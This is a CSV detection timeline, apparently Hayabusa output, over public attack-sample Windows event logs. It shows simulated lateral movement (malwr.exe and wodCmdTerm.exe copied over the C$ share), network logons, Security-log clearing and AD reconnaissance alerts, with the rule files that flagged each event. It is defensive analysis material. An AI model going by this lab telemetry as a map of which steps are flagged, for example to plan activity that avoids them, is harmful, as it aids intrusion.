2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\setup.bat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\wodCmdTerm.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55585  :  LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49244  :  LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49249  :  LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55872  :  LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49222  :  LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 55873  :  LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$  :  Share Name: \\*\SYSVOL  :  Share Path: \??\C:\Windows\SYSVOL\sysvol  :  IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: NULL  :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49236  :  LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation:   :  IP Address: 10.0.2.17  :  Port: 49237  :  LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator  :  LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
